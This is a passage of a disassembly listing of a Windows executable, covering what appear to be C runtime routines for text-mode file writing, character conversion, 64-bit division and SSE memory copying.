; ---------------------------------------------------------------------------

loc_40D369:				; CODE XREF: sub_40D20A+2E0j
		mov	esi, [ebp+518h+var_58C]

loc_40D36C:				; CODE XREF: sub_40D20A+15Dj
		mov	al, [ebp+518h+var_56D]
		test	al, al
		jnz	loc_40D47D
		mov	al, [esi]
		xor	ecx, ecx
		cmp	al, 0Ah
		setz	cl
		movsx	eax, al
		push	eax
		mov	[ebp+518h+var_590], ecx
		call	sub_40CDE6
		test	eax, eax
		pop	ecx
		jnz	short loc_40D3AB
		push	1
		lea	eax, [ebp+518h+var_56C]
		push	esi
		push	eax
		call	sub_40F880
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40D758
		jmp	short loc_40D3DB
; ---------------------------------------------------------------------------

loc_40D3AB:				; CODE XREF: sub_40D20A+185j
		mov	eax, [ebp+518h+var_57C]
		sub	eax, esi
		add	eax, [ebp+518h+arg_8]
		cmp	eax, 1
		jbe	loc_40D758
		push	2
		lea	eax, [ebp+518h+var_56C]
		push	esi
		push	eax
		call	sub_40F880
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40D758
		inc	esi
		inc	[ebp+518h+var_574]

loc_40D3DB:				; CODE XREF: sub_40D20A+19Fj
		xor	eax, eax
		push	eax
		push	eax
		push	5
		lea	ecx, [ebp+518h+var_C]
		push	ecx
		push	1
		lea	ecx, [ebp+518h+var_56C]
		push	ecx
		push	eax
		push	[ebp+518h+var_594]
		inc	esi
		inc	[ebp+518h+var_574]
		mov	[ebp+518h+var_58C], esi
		call	ds:dword_41D134	; WideCharToMultiByte
		mov	esi, eax
		test	esi, esi
		jz	loc_40D758
		push	0
		lea	eax, [ebp+518h+var_568]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_C]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	loc_40D74F
		mov	eax, [ebp+518h+var_568]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D758
		cmp	[ebp+518h+var_590], 0
		jz	loc_40D4E1
		push	0
		lea	eax, [ebp+518h+var_568]
		push	eax
		push	1
		lea	eax, [ebp+518h+var_C]
		push	eax
		mov	eax, [edi]
		mov	[ebp+518h+var_C], 0Dh
		push	dword ptr [ebx+eax]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	loc_40D74F
		cmp	[ebp+518h+var_568], 1
		jl	loc_40D758
		inc	[ebp+518h+var_580]
		inc	[ebp+518h+var_578]
		jmp	short loc_40D4E1
; ---------------------------------------------------------------------------

loc_40D47D:				; CODE XREF: sub_40D20A+167j
		cmp	al, 1
		jz	short loc_40D485
		cmp	al, 2
		jnz	short loc_40D4A0

loc_40D485:				; CODE XREF: sub_40D20A+275j
		movzx	ecx, word ptr [esi]
		xor	edx, edx
		cmp	cx, 0Ah
		setz	dl
		inc	esi
		inc	esi
		add	[ebp+518h+var_574], 2
		mov	[ebp+518h+var_56C], ecx
		mov	[ebp+518h+var_58C], esi
		mov	[ebp+518h+var_590], edx

loc_40D4A0:				; CODE XREF: sub_40D20A+279j
		cmp	al, 1
		jz	short loc_40D4A8
		cmp	al, 2
		jnz	short loc_40D4E1

loc_40D4A8:				; CODE XREF: sub_40D20A+298j
		push	[ebp+518h+var_56C]
		call	sub_41088C
		cmp	ax, word ptr [ebp+518h+var_56C]
		pop	ecx
		jnz	loc_40D74F
		inc	[ebp+518h+var_578]
		cmp	[ebp+518h+var_590], 0
		jz	short loc_40D4E1
		push	0Dh
		pop	eax
		push	eax
		mov	[ebp+518h+var_56C], eax
		call	sub_41088C
		cmp	ax, word ptr [ebp+518h+var_56C]
		pop	ecx
		jnz	loc_40D74F
		inc	[ebp+518h+var_578]
		inc	[ebp+518h+var_580]

loc_40D4E1:				; CODE XREF: sub_40D20A+232j
					; sub_40D20A+271j ...
		mov	eax, [ebp+518h+arg_8]
		cmp	[ebp+518h+var_574], eax
		jb	loc_40D369
		jmp	loc_40D758
; ---------------------------------------------------------------------------

loc_40D4F5:				; CODE XREF: sub_40D20A+EFj
					; sub_40D20A+FCj ...
		mov	eax, [edi]
		add	eax, ebx
		test	byte ptr [eax+4], 80h
		jz	loc_40D728
		mov	eax, [ebp+518h+var_57C]
		xor	esi, esi
		cmp	[ebp+518h+var_56D], 0
		mov	[ebp+518h+var_56C], esi
		jnz	loc_40D5A6
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_568], eax
		jbe	loc_40D789

loc_40D524:				; CODE XREF: sub_40D20A+395j
		mov	ecx, [ebp+518h+var_568]
		and	[ebp+518h+var_574], 0
		sub	ecx, [ebp+518h+var_57C]
		lea	eax, [ebp+518h+var_564]

loc_40D531:				; CODE XREF: sub_40D20A+354j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D560
		mov	edx, [ebp+518h+var_568]
		inc	[ebp+518h+var_568]
		mov	dl, [edx]
		inc	ecx
		cmp	dl, 0Ah
		jnz	short loc_40D551
		inc	[ebp+518h+var_580]
		mov	byte ptr [eax],	0Dh
		inc	eax
		inc	[ebp+518h+var_574]

loc_40D551:				; CODE XREF: sub_40D20A+33Bj
		mov	[eax], dl
		inc	eax
		inc	[ebp+518h+var_574]
		cmp	[ebp+518h+var_574], 400h
		jb	short loc_40D531

loc_40D560:				; CODE XREF: sub_40D20A+32Dj
		mov	esi, eax
		lea	eax, [ebp+518h+var_564]
		sub	esi, eax
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_564]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	loc_40D74F
		mov	eax, [ebp+518h+var_584]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D758
		mov	eax, [ebp+518h+var_568]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		jb	short loc_40D524
		jmp	loc_40D758
; ---------------------------------------------------------------------------

loc_40D5A6:				; CODE XREF: sub_40D20A+305j
		cmp	[ebp+518h+var_56D], 2
		jnz	loc_40D64D
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_568], eax
		jbe	loc_40D789

loc_40D5BF:				; CODE XREF: sub_40D20A+438j
		mov	ecx, [ebp+518h+var_568]
		xor	esi, esi
		sub	ecx, [ebp+518h+var_57C]
		lea	eax, [ebp+518h+var_564]

loc_40D5CA:				; CODE XREF: sub_40D20A+3F7j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D603
		mov	edx, [ebp+518h+var_568]
		add	[ebp+518h+var_568], 2
		movzx	edx, word ptr [edx]
		inc	ecx
		inc	ecx
		cmp	dx, 0Ah
		jnz	short loc_40D5F1
		add	[ebp+518h+var_580], 2
		mov	word ptr [eax],	0Dh
		inc	eax
		inc	eax
		inc	esi
		inc	esi

loc_40D5F1:				; CODE XREF: sub_40D20A+3D8j
		mov	edi, [ebp+518h+var_588]
		mov	[eax], dx
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		cmp	esi, 3FFh
		jb	short loc_40D5CA

loc_40D603:				; CODE XREF: sub_40D20A+3C6j
		mov	esi, eax
		lea	eax, [ebp+518h+var_564]
		sub	esi, eax
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		push	esi
		lea	eax, [ebp+518h+var_564]
		push	eax
		mov	eax, [edi]
		push	dword ptr [ebx+eax]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	loc_40D74F
		mov	eax, [ebp+518h+var_584]
		add	[ebp+518h+var_578], eax
		cmp	eax, esi
		jl	loc_40D758
		mov	eax, [ebp+518h+var_568]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		jb	loc_40D5BF
		jmp	loc_40D758
; ---------------------------------------------------------------------------

loc_40D64D:				; CODE XREF: sub_40D20A+3A0j
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_574], eax
		jbe	loc_40D789

loc_40D65C:				; CODE XREF: sub_40D20A+516j
		mov	ecx, [ebp+518h+var_574]
		and	[ebp+518h+var_568], 0
		sub	ecx, [ebp+518h+var_57C]
		push	2
		lea	eax, [ebp+518h+var_160]
		pop	esi

loc_40D66F:				; CODE XREF: sub_40D20A+497j
		cmp	ecx, [ebp+518h+arg_8]
		jnb	short loc_40D6A3
		mov	edx, [ebp+518h+var_574]
		movzx	edx, word ptr [edx]
		add	[ebp+518h+var_574], esi
		add	ecx, esi
		cmp	dx, 0Ah
		jnz	short loc_40D692
		mov	word ptr [eax],	0Dh
		add	eax, esi
		add	[ebp+518h+var_568], esi

loc_40D692:				; CODE XREF: sub_40D20A+47Cj
		add	[ebp+518h+var_568], esi
		mov	[eax], dx
		add	eax, esi
		cmp	[ebp+518h+var_568], 152h
		jb	short loc_40D66F

loc_40D6A3:				; CODE XREF: sub_40D20A+46Bj
		xor	esi, esi
		push	esi
		push	esi
		push	2ABh
		lea	ecx, [ebp+518h+var_410]
		push	ecx
		lea	ecx, [ebp+518h+var_160]
		sub	eax, ecx
		cdq
		sub	eax, edx
		sar	eax, 1
		push	eax
		mov	eax, ecx
		push	eax
		push	esi
		push	0FDE9h
		call	ds:dword_41D134	; WideCharToMultiByte
		mov	edi, eax
		cmp	edi, esi
		jz	short loc_40D74F

loc_40D6D6:				; CODE XREF: sub_40D20A+4F6j
		push	0
		lea	eax, [ebp+518h+var_584]
		push	eax
		mov	eax, edi
		sub	eax, esi
		push	eax
		lea	eax, [ebp+esi+518h+var_410]
		push	eax
		mov	eax, [ebp+518h+var_588]
		mov	eax, [eax]
		push	dword ptr [ebx+eax]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	short loc_40D704
		add	esi, [ebp+518h+var_584]
		cmp	edi, esi
		jg	short loc_40D6D6
		jmp	short loc_40D70D
; ---------------------------------------------------------------------------

loc_40D704:				; CODE XREF: sub_40D20A+4EFj
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		mov	[ebp+518h+var_56C], eax

loc_40D70D:				; CODE XREF: sub_40D20A+4F8j
		cmp	edi, esi
		jg	short loc_40D758
		mov	eax, [ebp+518h+var_574]
		sub	eax, [ebp+518h+var_57C]
		cmp	eax, [ebp+518h+arg_8]
		mov	[ebp+518h+var_578], eax
		jb	loc_40D65C
		jmp	short loc_40D758
; ---------------------------------------------------------------------------

loc_40D728:				; CODE XREF: sub_40D20A+2F3j
		push	0
		lea	ecx, [ebp+518h+var_584]
		push	ecx
		push	[ebp+518h+arg_8]
		push	[ebp+518h+var_57C]
		push	dword ptr [eax]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	short loc_40D74F
		mov	eax, [ebp+518h+var_584]
		and	[ebp+518h+var_56C], 0
		mov	[ebp+518h+var_578], eax
		jmp	short loc_40D758
; ---------------------------------------------------------------------------

loc_40D74F:				; CODE XREF: sub_40D20A+21Aj
					; sub_40D20A+25Bj ...
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		mov	[ebp+518h+var_56C], eax

loc_40D758:				; CODE XREF: sub_40D20A+199j
					; sub_40D20A+1AFj ...
		mov	eax, [ebp+518h+var_578]
		test	eax, eax
		jnz	short loc_40D7B5
		mov	edi, [ebp+518h+var_588]

loc_40D762:				; CODE XREF: sub_40D20A+153j
		xor	esi, esi
		cmp	[ebp+518h+var_56C], esi
		jz	short loc_40D789
		push	5
		pop	esi
		cmp	[ebp+518h+var_56C], esi
		jnz	short loc_40D77E
		call	sub_405B83
		mov	dword ptr [eax], 9
		jmp	short loc_40D7A9
; ---------------------------------------------------------------------------

loc_40D77E:				; CODE XREF: sub_40D20A+565j
		push	[ebp+518h+var_56C]
		call	sub_405BA9
		pop	ecx
		jmp	short loc_40D7B0
; ---------------------------------------------------------------------------

loc_40D789:				; CODE XREF: sub_40D20A+314j
					; sub_40D20A+3AFj ...
		mov	eax, [edi]
		test	byte ptr [ebx+eax+4], 40h
		jz	short loc_40D79E
		mov	eax, [ebp+518h+var_57C]
		cmp	byte ptr [eax],	1Ah
		jnz	short loc_40D79E
		xor	eax, eax
		jmp	short loc_40D7B8
; ---------------------------------------------------------------------------

loc_40D79E:				; CODE XREF: sub_40D20A+586j
					; sub_40D20A+58Ej
		call	sub_405B83
		mov	dword ptr [eax], 1Ch

loc_40D7A9:				; CODE XREF: sub_40D20A+572j
		call	sub_405B96
		mov	[eax], esi

loc_40D7B0:				; CODE XREF: sub_40D20A+CCj
					; sub_40D20A+57Dj
		or	eax, 0FFFFFFFFh
		jmp	short loc_40D7B8
; ---------------------------------------------------------------------------

loc_40D7B5:				; CODE XREF: sub_40D20A+553j
		sub	eax, [ebp+518h+var_580]

loc_40D7B8:				; CODE XREF: sub_40D20A+592j
					; sub_40D20A+5A9j
		pop	edi
		pop	ebx

loc_40D7BA:				; CODE XREF: sub_40D20A+37j
					; sub_40D20A+62j
		mov	ecx, [ebp+518h+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		add	ebp, 518h
		leave
		retn
sub_40D20A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D7D0	proc near		; CODE XREF: sub_406B86+CBp
					; sub_406B86+13Ap ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	10h
		push	offset dword_421AD0
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40D7FF
		call	sub_405B96
		and	dword ptr [eax], 0
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_40D7F7:				; CODE XREF: sub_40D7D0+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40D89C
; ---------------------------------------------------------------------------

loc_40D7FF:				; CODE XREF: sub_40D7D0+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40D80D
		cmp	eax, dword_4352E8
		jb	short loc_40D82E

loc_40D80D:				; CODE XREF: sub_40D7D0+33j
					; sub_40D7D0+7Cj
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_40D7F7
; ---------------------------------------------------------------------------

loc_40D82E:				; CODE XREF: sub_40D7D0+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:435300h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_40D80D
		push	eax
		call	sub_40F19E
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40D877
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D20A
		add	esp, 0Ch
		mov	[ebp+var_1C], eax
		jmp	short loc_40D88D
; ---------------------------------------------------------------------------

loc_40D877:				; CODE XREF: sub_40D7D0+8Fj
		call	sub_405B83
		mov	dword ptr [eax], 9
		call	sub_405B96
		mov	[eax], edi
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40D88D:				; CODE XREF: sub_40D7D0+A5j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40D8A2
		mov	eax, [ebp+var_1C]

loc_40D89C:				; CODE XREF: sub_40D7D0+2Aj
		call	__SEH_epilog4
		retn
sub_40D7D0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D8A2	proc near		; CODE XREF: sub_40D7D0+C4p
					; DATA XREF: _1fieagrn:00421AE8o
		push	dword ptr [ebp+8]
		call	sub_40F23E
		pop	ecx
		retn
sub_40D8A2	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D8AC	proc near		; CODE XREF: sub_406B86+9Cp
					; sub_40A03D+58p ...

arg_0		= dword	ptr  4

		inc	dword_427608
		push	1000h
		call	sub_407AEA
		test	eax, eax
		pop	ecx
		mov	ecx, [esp+arg_0]
		mov	[ecx+8], eax
		jz	short loc_40D8D5
		or	dword ptr [ecx+0Ch], 8
		mov	dword ptr [ecx+18h], 1000h
		jmp	short loc_40D8E6
; ---------------------------------------------------------------------------

loc_40D8D5:				; CODE XREF: sub_40D8AC+1Aj
		or	dword ptr [ecx+0Ch], 4
		lea	eax, [ecx+14h]
		mov	[ecx+8], eax
		mov	dword ptr [ecx+18h], 2

loc_40D8E6:				; CODE XREF: sub_40D8AC+27j
		mov	eax, [ecx+8]
		and	dword ptr [ecx+4], 0
		mov	[ecx], eax
		retn
sub_40D8AC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D8F0	proc near		; CODE XREF: sub_406B86+91p
					; sub_408ACB+Cp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40D907
		call	sub_405B83
		mov	dword ptr [eax], 9
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40D907:				; CODE XREF: sub_40D8F0+7j
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jl	short loc_40D916
		cmp	eax, dword_4352E8
		jb	short loc_40D932

loc_40D916:				; CODE XREF: sub_40D8F0+1Cj
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 9
		call	sub_4032F9
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40D932:				; CODE XREF: sub_40D8F0+24j
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_435300[ecx*4]
		movzx	eax, byte ptr [ecx+eax+4]
		and	eax, 40h
		pop	esi
		retn
sub_40D8F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D94E	proc near		; CODE XREF: sub_407D29:loc_407D4Cp
		push	esi
		push	edi
		xor	edi, edi

loc_40D952:				; CODE XREF: sub_40D94E+1Aj
		lea	esi, off_423F80[edi]
		push	dword ptr [esi]
		call	sub_4054D7
		add	edi, 4
		cmp	edi, 28h
		pop	ecx
		mov	[esi], eax
		jb	short loc_40D952
		pop	edi
		pop	esi
		retn
sub_40D94E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D96D	proc near		; CODE XREF: sub_406D87+554p
		mov	eax, dword_423064
		or	eax, 1
		xor	ecx, ecx
		cmp	dword_427A60, eax
		setz	cl
		mov	eax, ecx
		retn
sub_40D96D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D983	proc near		; CODE XREF: sub_40DAE2+12p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= word ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		mov	edi, [ebp+arg_8]
		jnz	short loc_40D9A9
		cmp	edi, ebx
		jbe	short loc_40D9A9
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40D9A5
		mov	[eax], ebx

loc_40D9A5:				; CODE XREF: sub_40D983+1Ej
					; sub_40D983+ECj ...
		xor	eax, eax
		jmp	short loc_40DA28
; ---------------------------------------------------------------------------

loc_40D9A9:				; CODE XREF: sub_40D983+13j
					; sub_40D983+17j
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40D9B3
		or	dword ptr [eax], 0FFFFFFFFh

loc_40D9B3:				; CODE XREF: sub_40D983+2Bj
		cmp	edi, 7FFFFFFFh
		jbe	short loc_40D9D6
		call	sub_405B83
		push	16h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4032F9
		add	esp, 14h

loc_40D9D2:				; CODE XREF: sub_40D983+CCj
					; sub_40D983+D5j
		mov	eax, esi
		jmp	short loc_40DA28
; ---------------------------------------------------------------------------

loc_40D9D6:				; CODE XREF: sub_40D983+36j
		push	[ebp+arg_10]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	loc_40DA81
		mov	ax, [ebp+arg_C]
		cmp	ax, 0FFh
		jbe	short loc_40DA2D
		cmp	esi, ebx
		jz	short loc_40DA0A
		cmp	edi, ebx
		jbe	short loc_40DA0A
		push	edi
		push	ebx
		push	esi
		call	sub_407F20
		add	esp, 0Ch

loc_40DA0A:				; CODE XREF: sub_40D983+76j
					; sub_40D983+7Aj ...
		call	sub_405B83
		mov	dword ptr [eax], 2Ah
		call	sub_405B83
		cmp	[ebp+var_4], bl
		mov	eax, [eax]
		jz	short loc_40DA28
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_40DA28:				; CODE XREF: sub_40D983+24j
					; sub_40D983+51j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40DA2D:				; CODE XREF: sub_40D983+72j
		cmp	esi, ebx
		jz	short loc_40DA5F
		cmp	edi, ebx
		ja	short loc_40DA5D

loc_40DA35:				; CODE XREF: sub_40D983+141j
					; sub_40D983+149j ...
		call	sub_405B83
		push	22h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40D9D2
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh
		jmp	loc_40D9D2
; ---------------------------------------------------------------------------

loc_40DA5D:				; CODE XREF: sub_40D983+B0j
		mov	[esi], al

loc_40DA5F:				; CODE XREF: sub_40D983+ACj
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_40DA6C
		mov	dword ptr [eax], 1

loc_40DA6C:				; CODE XREF: sub_40D983+E1j
					; sub_40D983+12Aj ...
		cmp	[ebp+var_4], bl
		jz	loc_40D9A5
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh
		jmp	loc_40D9A5
; ---------------------------------------------------------------------------

loc_40DA81:				; CODE XREF: sub_40D983+64j
		lea	ecx, [ebp+arg_4]
		push	ecx
		push	ebx
		push	edi
		push	esi
		push	1
		lea	ecx, [ebp+arg_C]
		push	ecx
		push	ebx
		mov	[ebp+arg_4], ebx
		push	dword ptr [eax+4]
		call	ds:dword_41D134	; WideCharToMultiByte
		cmp	eax, ebx
		jz	short loc_40DAB3
		cmp	[ebp+arg_4], ebx
		jnz	loc_40DA0A
		mov	ecx, [ebp+arg_0]
		cmp	ecx, ebx
		jz	short loc_40DA6C
		mov	[ecx], eax
		jmp	short loc_40DA6C
; ---------------------------------------------------------------------------

loc_40DAB3:				; CODE XREF: sub_40D983+11Aj
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 7Ah
		jnz	loc_40DA0A
		cmp	esi, ebx
		jz	loc_40DA35
		cmp	edi, ebx
		jbe	loc_40DA35
		push	edi
		push	ebx
		push	esi
		call	sub_407F20
		add	esp, 0Ch
		jmp	loc_40DA35
sub_40D983	endp


; =============== S U B	R O U T	I N E =======================================



sub_40DAE2	proc near		; CODE XREF: sub_406D87+487p
					; sub_406D87+8B1p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	0
		push	[esp+4+arg_C]
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40D983
		add	esp, 14h
		retn
sub_40DAE2	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40DB00	proc near		; CODE XREF: sub_406D87+786p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	esi
		mov	eax, [esp+4+arg_C]
		or	eax, eax
		jnz	short loc_40DB31
		mov	ecx, [esp+4+arg_8]
		mov	eax, [esp+4+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+4+arg_0]
		div	ecx
		mov	esi, eax
		mov	eax, ebx
		mul	[esp+4+arg_8]
		mov	ecx, eax
		mov	eax, esi
		mul	[esp+4+arg_8]
		add	edx, ecx
		jmp	short loc_40DB78
; ---------------------------------------------------------------------------

loc_40DB31:				; CODE XREF: sub_40DB00+7j
		mov	ecx, eax
		mov	ebx, [esp+4+arg_8]
		mov	edx, [esp+4+arg_4]
		mov	eax, [esp+4+arg_0]

loc_40DB3F:				; CODE XREF: sub_40DB00+49j
		shr	ecx, 1
		rcr	ebx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ecx, ecx
		jnz	short loc_40DB3F
		div	ebx
		mov	esi, eax
		mul	[esp+4+arg_C]
		mov	ecx, eax
		mov	eax, [esp+4+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_40DB6D
		cmp	edx, [esp+4+arg_4]
		ja	short loc_40DB6D
		jb	short loc_40DB76
		cmp	eax, [esp+4+arg_0]
		jbe	short loc_40DB76

loc_40DB6D:				; CODE XREF: sub_40DB00+5Dj
					; sub_40DB00+63j
		dec	esi
		sub	eax, [esp+4+arg_8]
		sbb	edx, [esp+4+arg_C]

loc_40DB76:				; CODE XREF: sub_40DB00+65j
					; sub_40DB00+6Bj
		xor	ebx, ebx

loc_40DB78:				; CODE XREF: sub_40DB00+2Fj
		sub	eax, [esp+4+arg_0]
		sbb	edx, [esp+4+arg_4]
		neg	edx
		neg	eax
		sbb	edx, 0
		mov	ecx, edx
		mov	edx, ebx
		mov	ebx, ecx
		mov	ecx, eax
		mov	eax, esi
		pop	esi
		retn	10h
sub_40DB00	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DB95	proc near		; CODE XREF: sub_40DC1C+4Dp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		mov	[ebp+var_4], edi
		mov	[ebp+var_8], esi
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_8]
		shr	ecx, 7
		jmp	short loc_40DBB5
; ---------------------------------------------------------------------------
		db 8Dh,	9Bh, 4 dup(0)
; ---------------------------------------------------------------------------

loc_40DBB5:				; CODE XREF: sub_40DB95+18j
					; sub_40DB95+7Bj
		movdqa	xmm0, oword ptr	[esi]
		movdqa	xmm1, oword ptr	[esi+10h]
		movdqa	xmm2, oword ptr	[esi+20h]
		movdqa	xmm3, oword ptr	[esi+30h]
		movdqa	oword ptr [edi], xmm0
		movdqa	oword ptr [edi+10h], xmm1
		movdqa	oword ptr [edi+20h], xmm2
		movdqa	oword ptr [edi+30h], xmm3
		movdqa	xmm4, oword ptr	[esi+40h]
		movdqa	xmm5, oword ptr	[esi+50h]
		movdqa	xmm6, oword ptr	[esi+60h]
		movdqa	xmm7, oword ptr	[esi+70h]
		movdqa	oword ptr [edi+40h], xmm4
		movdqa	oword ptr [edi+50h], xmm5
		movdqa	oword ptr [edi+60h], xmm6
		movdqa	oword ptr [edi+70h], xmm7
		lea	esi, [esi+80h]
		lea	edi, [edi+80h]
		dec	ecx
		jnz	short loc_40DBB5
		mov	esi, [ebp+var_8]
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40DB95	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DC1C	proc near		; CODE XREF: sub_407720+42j
					; sub_407FA0+42j ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		mov	[ebp+var_C], edi
		mov	[ebp+var_8], esi
		mov	[ebp+var_4], ebx
		mov	ebx, [ebp+arg_4]
		mov	eax, ebx
		cdq
		mov	ecx, eax
		mov	eax, [ebp+arg_0]
		xor	ecx, edx
		sub	ecx, edx
		and	ecx, 0Fh
		xor	ecx, edx
		sub	ecx, edx
		cdq
		mov	edi, eax
		xor	edi, edx
		sub	edi, edx
		and	edi, 0Fh
		xor	edi, edx
		sub	edi, edx
		mov	edx, ecx
		or	edx, edi
		jnz	short loc_40DC9F
		mov	esi, [ebp+arg_8]
		mov	ecx, esi
		and	ecx, 7Fh
		mov	[ebp+var_18], ecx
		cmp	esi, ecx
		jz	short loc_40DC77
		sub	esi, ecx
		push	esi
		push	ebx
		push	eax
		call	sub_40DB95
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebp+var_18]

loc_40DC77:				; CODE XREF: sub_40DC1C+46j
		test	ecx, ecx
		jz	short loc_40DCF2
		mov	ebx, [ebp+arg_8]
		mov	edx, [ebp+arg_4]
		add	edx, ebx
		sub	edx, ecx
		mov	[ebp+var_14], edx
		add	ebx, eax
		sub	ebx, ecx
		mov	[ebp+var_10], ebx
		mov	esi, [ebp+var_14]
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_18]
